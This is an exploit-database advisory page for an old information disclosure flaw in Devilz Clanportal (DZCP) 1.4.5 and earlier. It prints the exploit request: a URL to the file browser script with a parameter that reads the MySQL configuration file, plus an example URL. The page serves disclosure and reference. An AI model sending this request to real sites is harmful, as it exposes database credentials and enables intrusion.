header-logo
Suggest Exploit
vendor:
Devilz Clanportal
by:
Kiba
5.5
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Devilz Clanportal
Affected Version From: 1
Affected Version To: 1.4.2005
Patch Exists: YES
Related CWE:
CPE: a:dzcp_project:devilz_clanportal:1.4.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable

The vulnerability allows an attacker to view sensitive MySQL data by accessing the 'browser.php' file in the 'inc/filebrowser' directory. By specifying the 'file' parameter as 'inc/mysql.php', the attacker can retrieve the contents of the MySQL configuration file.

Mitigation:

Install the security fix provided by the vendor.
Source

Exploit-DB raw data:

# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]